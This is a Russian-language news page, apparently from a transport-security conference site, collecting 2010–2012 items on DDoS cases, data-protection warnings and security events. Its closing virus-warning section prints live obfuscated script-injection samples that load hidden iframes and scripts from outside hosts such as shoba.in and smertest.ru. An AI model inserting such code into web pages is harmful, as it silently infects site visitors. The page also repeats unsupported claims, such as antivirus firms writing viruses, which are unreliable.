ВНИМАНИЕ! Многие фирмы для регистрации на конференции и выставки требуют предоставление всех персональных данных Клиентов. Ни в коем случае не предоставляйте Ваши данные. Это является грубым нарушением ФЗ-16 "О персональных данных" и лазейки для мошенников. Заполучив все данные Клиентов через Интернет, мошенники смогут производить правонарушающие действия против Вас, в том числе, отнимать Вашу недвижимость, брать кредиты от имени Вас и пр. Требовали предоставление персональных данных издательство "Дороги" при аккредитации журналистов на V Юбилейный Международный форум и выставку "Транспорт России" в рамках "Транспортнойю недели" и в 2010, и в 2011, выступающие от имени МинТранса, в Сокольниках.... Также есть и другие фирмы при аккредитации на различные мероприятия..... Наш корреспондент поинтересовался, для каких целей, нужно предоставлять ВСЕ персональные данные, ответ оказался простой: "чтобы не стоять в очереди за разовым пропуском.... Супер для мошенников!!!

В 2010 году от одной из турфирм Подмосковья в Управление "К" МВД поступило заявление о том, что вирус-скрипт src= http:// sosna.krasno.ru/templates/tmp.php проник на сайт турфирмы. Оказалось, что Красная Сосна - это имя подмосковного провайдера в г.Красногорск, к которому проник вирус на центральный сервер уже очень давно и через этот зараженный сервер вирус распространялся на всех пользователей сети. Только после вмешательства МВД провайдер принял информацию во внимание и удалил вирус.

На многие сайты, в том числе и наш, проникали вирусные скрипты. Эти вирусы распростряняются часто с IP-адресов из США и ловить хакеров нужно через Интерпол, если наши антивирусные фирмы не могут разработать эффективный антиспам. Кроме того, причиной засылки вирусов является конкурентная атака. Если фирма из С.Петербурга, специализирующаяся по морским круизам, начинает проводить конференции по авиационной безопасности и при этом вскрывается сайт тех, кто уже много лет занимется этой проблемой - это конкурентная атака......

IT - НОВОСТИ

14 мая 2012 года в Москве, в Экспоцентре на Красной Пресне открылся Третий российский форум по управлению интернетом - Форум по информационной безопасности, организованный Координационным центром национального домена сети Интернет при поддержке Министерства связи и массовых коммуникаций РФ. Открыл форум министр связи и массовых коммуникаций РФ Игорь Щеголев, который в своем выступлении особое внимание уделил роли предпринимаемым Россией и международным сообществом усилий по обеспечению информационной безопасности. Форум продолжился лекцией Джеффа Мосса, вице-президент по вопросам безопасности ICANN "Технологические аспекты кибербезопасности", которую сам лектор снабдил подзаголовком "Почему я никому не доверяю?"

05.05.2012. Наступление сезона отпусков ознаменовалось активизацией интернет-мошенников, которые рассылают вредоносные программы под видом подтверждений брони отелей,- об этом сообщила компания G Data Software, которая занимается разработкой решений для защиты информации. По сообщению специалистов, мошенники прикладывают зараженные файлы к письмам, прикрываясь названиями популярных сервисов для бронирования, таких как booking.com. После открытия приложенного файла компьютер туриста заражается вирусом "банковский троян", за счет чего мошенник получает доступ к средствам на банковском счете пострадавшего. Более того, эксперты прогнозируют атаку злоумышленников на турагентства. Чтобы не попасться на удочку мошенников, эксперты рекомендуют туристам соблюдать простые правила: во-первых, перед открытием файла удостовериться, что имя отправителя письма и название компании совпадают; во-вторых, проследить, чтобы название отеля и дата были указаны в теле письма, а не в приложенном к нему файле.

05.05.2012. Заместитель Генерального прокурора Российской Федерации Виктор Гринь утвердил обвинительное заключение по уголовному делу в отношении Павла Врублевского, Максима Пермякова, братьев Игоря и Дмитрия Артимовичей. Они обвиняются в совершении преступлений, предусмотренных ч. 2 ст. 272 УК РФ (неправомерный доступ к компьютерной информации, причинивший крупный ущерб) и ч. 1 ст. 273 УК РФ (создание, использование и распространение вредоносных компьютерных программ), сообщает пресс-служба Генпрокуратуры России. "Расследованием по делу установлено, что Врублевский, являясь генеральным директором ЗАО "Хронопэй", в начале июля 2010 г. решил предпринять меры к разрыву контракта между ОАО "Аэрофлот" и ООО "Ассист" об оказании услуг по продаже электронных авиабилетов, устранив тем самым конкурента своей фирмы в данной сфере. Для этого он в г. Москве создал организованную группу, куда помимо него вошли подчиненный ему ведущий специалист службы информационной безопасности Пермяков, а также братья Артимович, занимавшиеся оказанием хакерских услуг", - пояснили в Генпрокуратуре. Руководя указанной организованной группой, Врублевский в июле 2010 г. через Пермякова поставил задачу братьям Артимович, имеющим в пользовании созданную ими же с использованием вредоносных программ сеть зараженных компьютеров (Bot-сеть), произвести хакерскую атаку на сайт ОАО "Аэрофлот" по продаже билетов. За указанные действия Врублевский выделил денежные средства предприятия в размере более 20 тыс. долларов США, которые Пермяков по мере необходимости перечислил братьям Артимович за работу. Артимовичи, выполняя полученное указание, находясь в съемной квартире в г. Москве, и действуя со своего ноутбука, имеющего подключение к сети Интернет в период с 15 по 24 июля 2010 г. осуществили компьютерную DdoS-атаку (типа "отказ в обслуживании") на информационные ресурсы ООО "Ассист", которая заключалась в одномоментном обращении множества компьютеров, входящих в Bot-сеть, с запросом на обслуживание. Осуществление данной компьютерной атаки привело к блокированию работы системы оплаты и приобретения электронных билетов на сайте ОАО "Аэрофлот" на весь период атаки и причинению потерпевшим фирмам крупного материального ущерба: ООО "Ассист" - на сумму около 15 млн. руб., ОАО "Аэрофлот" - на сумму свыше 146 млн.руб., уточнили в Генпрокуратуре. Уголовное дело расследовано Следственным управлением Федеральной службы безопасности Российской Федерации. После утверждения обвинительного заключения уголовное дело направлено в Тушинский районный суд г. Москвы для рассмотрения по существу,- сообщает АВИА.ру.

26.04.2012. Шокирующее сообщение увидели пользователи сайта аэропорта Таити (Французская Полинезия), подвергшегося хакерской атаке. Воздушная гавань на своей странице в Интернете разместила написанное с грамматическими и орфографическими ошибками известие о падении частного самолета, на котором якобы летел президент Франции Николя Саркози, передает ИТАР-ТАСС.

11.03.2012. Российский авиаперевозчик намерен судиться с владельцами эротического сайта aeroflot.xxx. <Аэрофлот> столкнулся со случаем пиратского использования своего бренда в названии домена, зарегистрированного в приватной зоне для <клубнички>. Если обычно киберсквоттеры приобретают домены с целью дальнейшей перепродажи, то в данном случае на сайте размещен контент из категории <для взрослых>, что, как считают в <Аэрофлоте>, вредит репутации компании. Доменное имя aeroflot.xxx, согласно официальным данным регистратора ICM Registry, было приобретено 10 декабря 2011 года грузинской компанией VivaVia. Данный сайт используется для продвижения услуг по продаже авиапутешествий на острова, пояснил <Известиям> администратор домена и одновременно один из его совладельцев гражданин Грузии Коба Гигинешвили. Вторым совладельцем, по его словам, выступает гражданин США Валентин Тимченко. В <Аэрофлоте> <Известиям> заявили, что знают о существовании сайта aeroflot.xxx и настроены на решительные действия. При этом в авиакомпании не сомневаются в порнографической направленности ресурса. Сотрудниками службы безопасности перевозчика уже установлены его владельцы, которых, скорее всего, теперь ожидает судебное преследование. Судебное решение, если оно будет, может содержать требования о пресечении действий сайта и передаче домена правообладателю, считает юрист <Технического центра Интернет> Сергей Копылов. Вся судебная практика во всех доменных зонах, включая и иностранные и российские, стоит на стороне правообладателя, добавляет эксперт. Опрошенные <Известиями> крупные российские аэропорты и авиакомпании пока не видят серьезной опасности со стороны зоны xxx. Одновременно все они считают свое присутствие в интернет-пространстве одним из важнейших каналов продвижения услуг. Во Внуково не видят для себя рисков в том, что домены vnukovo.com и vnukovoairport.com уже зарегистрированы киберсквоттерами. В авиакомпании <Трансаэро> серьезно подходят к доменным вопросам: в дополнение к российскому сайту работают ресурсы на других доменных зонах - .us, .de, .co, .li, .ch и даже мобильный сайт в зоне .mobi. Похожую политику в области покупки доменных имен ведут и в авиакомпании <Сибирь>.

08/03/2012. Поздравляем Всех посетительниц нашего сайта с Праздником 8 марта! ЖЕЛАЕМ ЗДОРОВЬЯ И УДАЧИ, чтобы Ваши мужчины не были жадными, предателями и не присылали вместо цветов Вам компьютерные вирусы..

04/03/2012. В день выборов Президента России наблюдались многочисленные хакерские атаки с сайтов, зарегистрированных в США и других странах, в т.ч., Азии. Однако электронная система выборов выстояла и хакеры не внесли сбоя.

07.02.2012. февраля 2012 года прошел III ежегодный <Форум Безопасного Интернета> - ФБИ2012.рф - главная ежегодная отраслевая конференция, посвященная проблемам безопасности детей и взрослых в интернете. Создается "Черный" список опасных сайтов, с нашей точки зрения, это не эффективно, поскольку нужна законодательгная база и "черный" список мошенников, которые могут открывать сайты каждый день. По анализу, 90% спама и хакерских атак в России исходит из США. Закон о саморегулируемых организациях в России неэффективен и не поможет решить проблему, поскольку написан неправильно (нельзя привлечь общественность), - считает М.Якушев,РОТЭК. Борьба с нежелательны контентом ведется путем фильтрации: DNS, семантический, графический и видео анализ. Наиболее опасны по части вирусов сайты "В контакте", "Facedook",через которые хакеры попадают на законопослушные сайты. По части платежей - наиболее защищена банковская карта.

17.01.2012. В понедельник из-за хакерских атак оказались парализованы сайты биржи в Тель-Авиве и израильской авиакомпании El Al, пишут "Известия". В результате действий киберпреступников прекратил работу и сайт компании El Al, крупнейшего авиаперевозчика Израиля. В отличие от биржевой страницы, он оказался недоступен полностью. Израильский сайт Ynet сообщает, что сайты "упали" в результате действий пропалестинских хакеров. Утром в понедельник о намерении провести кибератаку сообщил пользователь с ником 0xOmar, замеченный ранее в подобных преступлениях. По его словам, он входит в группировку хакеров, именующих себя Nightmare ("Ночной кошмар").

02.11.2011. В понедельник Мосгорсуд отказался освободить под залог в 30 млн рублей обвиняемого в хакерской атаке на "Аэрофлот" основного владельца ЗАО "Хронопэй" (Chronopay) Павла Врублевского, сообщает Финмаркет. > Бизнесмен обвиняется по ст.ст.272 (неправомерный доступ к компьютерной информации) и 273 (создание, использование и распространение вредоносных программ) УК РФ. По этим статьям ему грозит лишение свободы на срок от 3 до 7 лет. 18 октября Лефортовский суд Москвы продлил арест П.Врублевского до 23 декабря. По версии следствия, П. Врублевский летом прошлого года организовал ddos-атаку на информационные ресурсы российской процессинговой системы Assist, что повлекло блокировку работы платежной системы и возможности приобретения ее пользователями электронных билетов на сайте "Аэрофлота". Следствие полагает, что П. Врублевский заказал хакерскую атаку, желая избавиться от конкурента, так как сам претендовал на заключение контракта по продаже электронных билетов для авиакомпании. "Аэрофлот" позже отказался от сотрудничества с Assist. В итоге, согласно материалам уголовного дела, обе компании - и "Аэрофлот", и Assist - понесли убытки на сумму более 1 млн рублей. Источник, близкий к П. Врублевсокому, не исключает, что бизнесмен дал признательные показания вынужденно, в силу обстоятельств. По словам источника, П.Врублевский - единственный содержащийся под стражей в России фигурант дела, связанного с ddos-атакой. Состояние здоровья бизнесмена в последнее время ухудшилось, о чем имеются заключения медицинских служб Лефортовского изолятора, заявил источник . По его мнению, отказ в освобождении П. Врублевского свидетельствует о продолжении давления на бизнесмена. Доля Chronopay на российском рынке интернет-эквайринга оценивается примерно в 40%. П. Врублевский - основной владелец "Хронопэй", ранее он вел переговоры о продаже бизнеса с рядом банков и финансовых структур, сообщил "Интерфаксу" близкий к компании источник. По его мнению, некоторые претенденты на "Хронопэй" могут иметь отношение к преследованию П.Врублевского.

02.11.2011. S7 Airlines, участник глобального авиационного альянса oneworld, объявляет об открытии продажи авиабилетов на одном из крупнейших туристических порталов - Orbitz. AEX.ru "Orbitz - один из самых популярных сайтов по продаже билетов и туристических услуг, это сотрудничество позволит нам привлечь новых пассажиров, в том числе за рубежом. Как показывает наш опыт, туристические онлайн-агентства являются эффективным каналом продаж - все больше потребителей предпочитают выбирать и оплачивать услуги через Интернет", - отметил директор по продажам S7 Airlines Максим Полухин.

18/10/2011. Сегодня отрылась выставка RIW-2011 в Експоцентре и семинары по темам: КАДРЫ ( Обзор рынка труда: тенденции, проблемы, перспективы), ПО ЭЛЕКТРОННОЙ КОММЕРЦИИ, Рунет и его аудитория, Интернет-СМИ, Видео в интернете, Облачные сервисы: от фантастических идей к практическому применению, БЕЗОПАСНЫЙ РУНЕТ. + Безопасный Рунет и законодательство

22/07.2011. В аэропорту Домодедово спецслужбы нашли контрафактный софт. "Левые" программы использовались в системах аэронавигации и безопасности аэропорта. Это выяснилось в ходе расследовании причин январского теракта, в котором погибли 37 человек, пишут Известия. Пресс-служба Домодедово дает пояснения: В своей деятельности предприятия Московского аэропорта Домодедово используют офисное и специализированное программное обеспечение производственных процессов. Специализированное ПО, такое как система регистрации пассажиров, центральная база данных аэровокзала (авиарасписание и т.д.), система управления ресурсами аэропорта, система согласования и обработки багажа - SITA, ULTRA ELECTRONICS, INFORM. Оофисное ПО и Системы управления БД подтверждается лицензионными соглашениями с ведущими мировыми разработчиками и поставщиками: Microsoft, IBM, Adobe, Oracle и их аудитом. ПО, обеспечивающее деятельность аэронавигационных систем, приобретается и эксплуатируется Московским МЦ АУВД,-сообщает пресс-служба Домодедово.

28/06.2011. Лефортовский суд Москвы в пятницу выдал санкцию на арест гендиректора компании "Хронопэй" Павла Врублевского, подозреваемого в организации хакерской атаки, блокировавшей покупку электронных билетов на сайте "Аэрофлота". Согласно поступившим в суд материалам, предприниматель подозревается в организации проведения компьютерной атаки типа "отказ в обслуживании (ddos-атака)" на информационные ресурсы российской компании "Ассист". Атака повлекла блокировку работы платежной системы и привела к невозможности приобретения ее пользователями электронных билетов на сайте "Аэрофлота". По данным следствия, в результате "Аэрофлот" и "Ассист" понесли убытки на сумму, превышающую 1 миллион рублей.

28/06.2011.Ленинский районный суд г. Калининграда вынес приговор по делу о мошенничестве в отношении ОАО "Авиакомпания "ЮТэйр" (UTair Aviation). Злоумышленник - житель Калининграда - в 2009 и 2010 гг. незаконно совершал покупки авиабилетов на сайте "ЮТэйр". Для чего мошенник использовал данные не принадлежащих ему банковских карт. Авиакомпании был нанесен материальный ущерб. Суд вынес злоумышленнику обвинительный приговор, назначив уголовное наказание. Отдел экономической безопасности "ЮТэйр" предупреждает: авиакомпания совместно с банками-партнёрами выполняет фрод-мониторинг - системную работу по предотвращению случаев мошенничества с использованием кредитных карт.

30/06/2011. Третий ежегодный форум Cisco Expo Learning Club на теплоходе РИО-1 состоялся в Москве 30 июня 2011 под девизом: "IТ - образование - флагман знаний в мире технологий". Третий ежегодный форум Cisco Expo Learning Club - живая встреча, где можно пообщаться с коллегами, обменяться опытом и знаниями в области сетевых технологий, узнать о новых способах повышения квалификации и уровня образования в ИТ-сфере. В рамках форума прошли - интерактивный конкурс для всех желающих на знание сетевых технологий. В конкурсе приняли участие ведущие инструкторы учебных центров, эксперты в области сетевых технологий, обладающие званием Certified Cisco Systems Instructor - CCSI. , а также развлекательный аукцион, спонсорами которого стали компании Jabra и Plantronics - производители решений для унифицированных коммуникаций. Дружеский фуршет, вручение призов победителям конкурса . В фойе форума организована выставочная зона, где партнеры Cisco Expo Learning Club продемонстрировали свои программы, продукты и решения, провели мастер-классы по сетевым технологиям. Представитель учебного центра "Микротест" считает. что знания лучше усваиваются, если совмещать обучение с отдыхом в красивом туристическом месте, отеле.

20/05/2011. БИБЛИО-ГЛОБУС, Туристический оператор: "Уважаемые коллеги! В связи с DDOS атакой на сайт компании, просим предоставить список IP-адресов (статический и/или динамический), которые могут использоваться для работы с нашим сайтом для включения их в "белый" список. В противном случае доступ на сайт может быть затруднен! Что такое IP-адрес: уникальный адрес компьютера в сети Интернет. Статическим называется адрес, постоянно закрепленный за определенным компьютером в сети. В отличие от статического динамический IP-адрес присваивается компьютеру каждый раз при входе в сеть. Пример: 195.60.174.90 Обратитесь к вашему системному администратору, если испытываете затруднения! Благодарим за оперативность и сотрудничество! "

14/05/2011. 10 мая открылась международная выставка "Экспоком -2011", на которой значительное внимание уделено информационной безопасности, защите каналов связи, аналоговой и цифровой информации,системам комплексной безопасности. И даже "Мегафон" разработал свои собственные программы по защите и обеспечению информационной безопасности. Возгласы о том, что Государство должно устраниться от контроля по информационной безопасности не возымели успеха. А 12.05 на форуме IT прошло голосование по вопросу безопасности Интерната: должно ли быть эффективным в борьбе за безопасность Государство или эту функцию нужно поручить саморегулирующим организациям, мнения разделились пополам..... , бизнес не хочет сдаваться, но жадность еще никогда не приводила к безопасности .....

03/02/2011. Документы для служебного пользования, посвященные обеспечению безопасности аэропортов России (Домодедово, Кольцово) , а также рекомендованным методам выявления террористов на транспорте, оказались в свободном доступе в Интернете, сообщает Newsru.com. Руководитель направления конкурентной разведки компании "Диалог Наука" Андрей Масалович , в ходе аудита информационной безопасности нескольких транспортных организаций, заказанного ими после теракта в столичном аэропорту "Домодедово", обнаружил пять таких секретных документов. В сети Интернет обнаружились даже логины и пароли от FTP-сервера организации "уровня крупной авиакомпании", с помощью которых террористы могут организовать наблюдение за файлами и при желании подменить электронную документацию.

02.06.2011. В настоящее время пользователи сети Интернет испытывают временные трудности с доступом на сайт аэропорта www.domodedovo.ru. Специалисты информационных служб аэропорта Домодедово прикладывают все необходимые усилия для нормализации доступа к интернет-ресурсу в кратчайшие сроки. Проблемы с доступом на сайт не повлияли на работу служб и систем аэропорта. Московский аэропорт Домодедово работает в штатном режиме. Всю необходимую информацию о статусе рейсов можно получить по круглосуточному телефону + 7 495 933 66 66. 03.06.2011. Работоспособность сайта аэропорта Домодедово www.domodedovo.ru полностью восстановлена. Проблемы с доступом на сайт не повлияли на работу служб и систем аэропорта. Аэропорт Домодедово приносит свои извинения за возможные неудобства. Московский Аэропорт Домодедово приносит свои извинения за возможные неудобства.

22/04/2011. 22 апреля 2011 года завершилось центральное весеннее мероприятие Рунета - "РИФ+КИБ 2011". Трехдневная выездная конференция проходила с 20 по 22 апреля в подмосковном пансионате "Лесные дали" - главное весеннее профильное мероприятие Рунета, которое продлится три дня - Конференция <РИФ+КИБ 2011>. Организатором мероприятия выступает Российская Ассоциация электронных коммуникаций (РАЭК), при поддержке Федерального агентства по печати и массовым коммуникациям. Стратегический партнер <РИФ+КИБ 2011> - компания <Ростелеком>. Открытие конференции <РИФ+КИБ> началось с вступительного слова Сергея Плуготаренко, директора РАЭК. Посредством твиттера к участникам Форума обратился Президент Российской Федерации Дмитрий Медведев: <Привет всем участникам РИФ! Удачной работы и содержательных дискуссий>. Со сцены собравшихся приветствовал Михаил Сеславинский, руководитель Федерального агентства по печати и массовым коммуникациям, который обратил внимание присутствовавших на то, что последние тенденции в сфере развития Рунета можно проиллюстрировать лозунгом <Из виртуального будущего - в эпистолярное прошлое!>, что подразумевает связь технологий виртуального и реального пространств. По словам Сергея, 57 млн. человек пользуются интернетом хотя бы раз в месяц, а общий прирост аудитории за два года составил 43% за последние два год, при этом 22 млн юзеров выходили в Сеть с мобильных устройств. Согласно данным Фонда <Общественное мнение>, к 2014 году проникновение Интернета вырастет до 71%, в то время как объем аудитории составит 80 млн человек. В настоящий момент Россия является вторым в Европе рынком по величине проникновения, однако с течением времени она может выйти на первое место, поскольку запас для развития довольно существенен: только начинают выходить в Сеть представители возрастной (45+) аудитории, а также жители небольших городов с населением менее 500 тыс. человек. Большое внимание было уделено Авторскому праву и информационной бзеопасности, которая после вступления в законную силу ФЗ-16 приобрала особую значимость.... На <РИФ+КИБ 2011> зарегистрировалось более 7500 участников. В первый день работы мероприятие посетило порядка 5000 человек. Во время открытия конференции к участникам посредством твиттера обратился Президент Российской Федерации Дмитрий Медведев: "Привет всем участникам РИФ! Удачной работы и содержательных дискуссий". Также с приветственным словом выступили: Михаил Сеславинский, руководитель Федерального агентства по печати и массовым коммуникациям, Илья Массух, заместитель Министра связи и массовых коммуникаций, Алексей Нащекин, вице-президент компании "Ростелеком". По традиции, первая общая секция прошла в формате обзорного доклада о развитии отрасли, который представили Сергей Плуготаренко, директор РАЭК, и Руслан Тагиев, генеральный директор TNS Россия. На сегодняшний день динамика роста и развития Рунета такова: 50 млн. человек пользуются интернетом хотя бы раз в месяц, при этом 22 млн юзеров выходили в Сеть с мобильных устройств. Согласно данным Фонда "Общественное мнение", к 2014 году проникновение Интернета вырастет до 71%, в то время как общий объем аудитории составит 80 млн человек. В настоящий момент Россия является вторым в Европе рынком по степени проникновения, однако с течением времени она может выйти на первое место, поскольку запас для развития довольно существенен: только начинают выходить в Сеть представители возрастной (45+) аудитории, а также жители небольших городов с населением менее 500 тыс. человек. Объем рекламного рынка на сегодняшний момент составляет 26,7 млрд. рублей, рынок веб-разработок в 2010-м году увеличился на 30% и составляет порядка 8-10 млрд. рублей, область SEO за минувший год выросла на 20% (7,2 млрд рублей в 2010-м году), а объемпродаж тиражного софта увеличился на 15% (100 млрд. рублей). Согласно прогнозам, оборот электронной торговли вырастет на 17% в 2011 году и составит 245 млрд. рублей, тогда как рынок электронных платежей достигнет 140 млрд. рублей. Согласно прочей представленной статистике, поисковики Рунета в общей сложности дают 250 млн. ответов в сутки. Ежедневно отправляется 12 млн писем, но получают пользователи гораздо больше корреспонденции - 264 млн электронных писем без учета спама. На социальные сети пользователями тратится в совокупности порядка 280 млн. часов в месяц, а блогов зарегистрировано 42,5 миллиона. Общее количество доменов в Рунете составляет более 3 млн. В первый день "РИФ+КИБ 2011" Министерство связи и массовых коммуникаций Российской Федерации провело круглый стол с участием ведущих специалистов отрасли под названием "Авторское право в Интернете. Контент и инфраструктура сети: инвестирование в развитие". Возглавил конференцию министр связи и массовых коммуникаций Игорь Щёголев, модератором дискуссии выступил заведующий кафедрой новых медиа и теории коммуникации факультета журналистики МГУ Иван Засурский. Одной из ключевых тем круглого стола стало обсуждения "вопросов инвестирования в создание связной инфраструктуры и новейших инфраструктурных решений в связи с возросшими требованиями к пропускной способности сетей и ростом популярности мультимедийного контента". Выступление Игоря Щёголева логически объединило две ветви круглого стола. По мнению министра, идеальной модели развития интернета нет, новым трендом станет новая платформа. Также он напомнил собравшимся о том, что не стоит применять старый подход по отношению к новым технологиям. Далее Игорь Олегович перевел направление беседы на другую, не менее важную тему: "Выработка стандартов и правил в сфере охраны прав на продукты интеллектуальной собственности". Сергей Плуготаренко поделился с участниками опытом работы Ассоциации в области саморегулирования Рунета и в законодательной сфере. Он отметил, что не всегда позиция интернет-отрасли принимается во внимание, но РАЭК будет делать все для ее донесения до органов государственной власти. Для этого будет активизирована работа Правовой комиссии РАЭК, будет производиться дальнейший анализ законодательства России, касающегося интернет-сферы. По итогам работы круглого стола были намечены направления дальнейшей работы и определены перспективы правовой регуляции отрасли. Также не осталось в стороне обсуждение безопасного интернета для детей. По итогам конференции РИФ+КИБ Игорь Щёголев рассказал о состоянии развития интернет-отрасли Президенту России Дмитрию Медведеву.

10/02/2011. Сегодня в Москве открылась i-COMference,посвященная современным медиа-процессам. В ходе конференции участники обсуждают состояние традиционных и сетевых СМИ в 2010 году, будущее печатных изданий и эволюцию журналистики. Сейчас 87% населения предпочитают читать печатные издания их цифровым версиям. В ходе конференции рассматриваются и правовые аспекты работы интернет-компаний c возможными изменениями в законодательстве РФ.

07/02/2011. Сегодня в Доме Правительства г.Москвы открылся инфофорум-2011, посвященный информационной безопасности. Роскомнадзор сообщил, что за 2010 год было 1608 жалоб по защите персональных данных, 21 иск поданы в суды о незаконном разглашении на сайтах, а за январь 2011 - уже 16 обращений. На 7 сайтах данные уничтожены, из них 5 сайтов были зарегистрированы на одно лицо,Д., из Подмосковья.., А вот представитель МВД предлагает перейти от МВД к саморегулированию... Интерес вызвал доклад представителя МИД А.Смирнова. Благодаря действиям (хакерским атакам) WikiLeaks прозошла утечка информации о незаконных действиях и доходах высших лиц государств, в частности, Египта, Туниса - это и спровоцировало народный гнев бедного населения. Норвегия выдвинула WikiLeaks на соискание Нобелевской премии мира... Инфофорум прошел в ключе с обсуждением перспективных направлений в области информационной безопасности.... докладчики наиболее интересных тем уже выразили желание выступить на нашем форуме по авиационной безопасности 16-17.06.2011.

03/02/2011. Документы для служебного пользования, посвященные обеспечению безопасности аэропортов России (Домодедово, Кольцово) , а также рекомендованным методам выявления террористов на транспорте, оказались в свободном доступе в Интернете, сообщает Newsru.com. Руководитель направления конкурентной разведки компании "Диалог Наука" Андрей Масалович , в ходе аудита информационной безопасности нескольких транспортных организаций, заказанного ими после теракта в столичном аэропорту "Домодедово", обнаружил пять таких секретных документов. В сети Интернет обнаружились даже логины и пароли от FTP-сервера организации "уровня крупной авиакомпании", с помощью которых террористы могут организовать наблюдение за файлами и при желании подменить электронную документацию.

25/11/2010. В Москве прошла торжественная церемония вручения "Премии Рунета-2010". Ведущими церемонии стали журналист "Эха Москвы" Александр Плющев, а также телеведущая и блогер Тина Канделаки. Во вручении премий участвовал Министра связи и телекоммуникаций И.Щеголев. Премия была вручена в восьми номинациях: Государство и общество, Культура и массовые коммуникации, Наука и образование, Экономика и бизнес, Здоровьеи отдых, Технологии и инновации. Одним из номинатов стал Е.Касперский. Для борьбы с вирусами Е.Касперский предложил создать межнациональную службу - типа Интерпола. Наш корреспондент задал ему вопрос, почему при лечении его программами вместе с вирусами удаляются файлы. Однако Евгений ответил,что про это ничего не знает...

05/10/2010. Сегодня была открыта выставка "Инфобезопасность" на Красной Пресне. Впервые прошла секция "ИБ в транспортной отрасли: общие вопросы и отраслевые особенности". О ТЗ на разработку комплексной системы информационной безопасности на транспорте долго рассказывал представитель МинТранса В.Ерошин, Система должна быть готова к 2013 году (из бюджетных срадств, сумма заказа не сообщается),а тогда, возможно, уже ТЗ устареет. Разрабатывает многоуровневую защиту информации ФГУП "ЗащитаИнфоТранс". НИИАС ОАО "РЖД" уже разработали свою ИС ТБ, за счет средств РЖД. Кроме того, был задан вопрос об убытках от взломов при продаже электронных билетов. Ответа не последовало. ... Сегодня же Госдума в итоге дискуссии приняла решение поддержать в первом чтении законопроект об уточнении порядка передачи персональных данных авиапассажиров воздушных судов в автоматизированные централизованные базы персональных данных, сообщает Полит.ru. Законопроект направлен на устранение правовой коллизии между законом "О транспортной безопасности" и Воздушным кодексом. Предлагается из Воздушного кодекса исключить пункт о том, что порядок передачи персональных данных авиапассажиров в автоматизированные централизованные базы персональных данных о пассажирах (АЦБПД) устанавливается федеральным правительством. Поправки в статью 85.1 Воздушного кодекса внесены 13 мая правительством.

30/09. От одной из турфирм Подмосковья в Управление "К" МВД поступило заявление о том, что вирус-скрипт src= http:// sosna.krasno.ru/templates/tmp.php проник на сайт турфирмы. Оказалось, что Красная Сосна - это имя подмосковного провайдера в г.Красногорск, к которому проник вирус на центральный сервер уже очень давно и через этот зараженный сервер вирус распространялся на всех пользователей сети. Только после вмешательства МВД провайдер принял информацию во внимание и удалил вирус.

На многие сайты, в том числе и наш, снова стали проникать вирусные скрипты. Эти вирусы распростряняются часто с IP-адресов из США и ловить хакеров нужно через Интерпол, если наши антивирусные фирмы не могут разработать эффективный антиспам. Кроме того, причиной засылки вирусов является конкурентная атака. Если фирма,специализирующаяся по морским круизам, начинает проводить конференции по авиационной безопасности и при этом вскрывается сайт тех, кто уже много лет занимется этой проблемой - это конкурентная атака......

Задайтесь вопросом : КТО и ЗАЧЕМ заносит вирусы и, быть может, тогда вы сможете найти ответ для себя, как бороться... Это могут просто хаккеры, испольующие Ваш сайт для рассылки СПАМа.... Одними из потенциальных заказчиков вирусов -это конкуренты. Мы уже сообщали, что наш сайт был вскрыт с целью похищения информации и в это же время другая фирма по морским круизам под эгидой ЕР в С.Петербурге вдруг сообщает о проведении конференции на нашу тему и размещает программу с нашими "ошибками", а стоимость в 7!!! раз выше,чем у нас... Таким же образом борются с ведушими туроператорами в России их конкуренты....Подпадали Корал Травел, Анекс, Пегас и другие... ....

Примеры вирусов

Внимание! Появился новый вирус – Троян Trajan-Clicker.J.S.Iframe.ai/

Этот Троян находится в текстовом файле .htm, вне тела:

<script src=http://shoba.in/block/Website_Page_Under_Construction.php ></script>

<script>function uDfWq(BLguro){ var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;");var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;"); fff=op.split("648"); }

document['w192r141i175t159121e'.replace(/[0-9]/g,'')]('<div id=ATDOE style="visibility:hidden;display:none">%22%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%22http%3A%2F%2Freklamma.com%2Fnewspost%2Fin.php%22%3E%3C%2Fiframe%3E</div>');function ZiQGVsmqK(bVDxhu){  fff.op.replace("950"); fff=op.split("312"); }

document['w146r196i113t188141e'.replace(/[0-9]/g,'')](unescape(document.getElementById('ATDOE').innerHTML));function SPnr(IpIxeMN){ var ZbRAlZGt = document.getElementById('aZCkvrZq');window.eval();window.eval(); }

function kNVR(rMQ){ window.eval(); fff.op.replace("966");window.eval(); }

function SBGfrfR(ngt){  fff=op.split("752"); fff.op.replace("498");var mKINvwDi = document.getElementById('MAprkE'); }

</script><script src=http://shoba.in/block/Website_Page_Under_Construction.php ></script>

А вот второй Троян, находится в теле файла:

<iframe frameborder="0" onload="if (!this.src){ this.src='http://smertest.ru:8080/index.php'; this.height='0'; this.width='0';}" >plroghcbmereldgxupsvruqpfycafoh</iframe>

Этот вирус «Доктор ВЕБ» вообще не видит, а антивирус лаб.Касперского или удаляет весь файл или пропускает… Обращались напрямую, но бесполезно… Работать не хотят, все хотят только денег… Есть мнение, что антивирусные компании сами и пишут вирусы, чтобы их антивирусные дорогостоящие программы чаще покупали…

В сетях Интернет наибольшую опасность приобретают вирусы.
Если к Вам пришло письмо от неизвестного автора, в том числе, с иностранных серверов с сомнительным заголовком в ремарке(темой), то рекомендуем Вам не открывать такое письмо. Вложенные файлы с расширением *.exe (например, biodata.exe, singles.exe, iamwithyou.exe), а также файлы 19887240.HTM, f491213244.att, приказ.doc сразу же удаляйте из Вашей почты. Кроме того, желательно установить антивирусные программы, например, лаборатории Касперского, Viru Safe Web v.8.0; программы для защиты от слома: SpamBuster v.1.61, Nuke Nubber v.2.9, @Guard v.2.2.Однако при использовании антивируса Касперского (Монитор) нужно учитывать, что опасно ставить ПО на серверы, поскольку при удалении вирусов возможно удаление файлов из системного реестра.

Двадцать наиболее распространенных в России сетевых угроз в апреле 2009:
1. Win32/Conficker.AA - 8,81 %
2. Win32/Conficker.AE - 4,99 %
3. INF/Autorun - 4,81 %
4. Win32/Agent - 3,84 %
5. INF/Conficker - 3,14 %
6. Win32/Conficker.Gen - 2,83 %
7. Win32/Tifaut.C - 2,58 % 8. INF/Autorun.gen - 2,16 %
9. Win32/TrojanDownloader.Wigon.BS - 1,56 %
10. Win32/Genetik - 1,54 %
11. Win32/Conficker.X - 1,52 %
12. Win32/Packed.Autoit.Gen - 1,12 %
13. Win32/Conficker.AL - 1,02 %
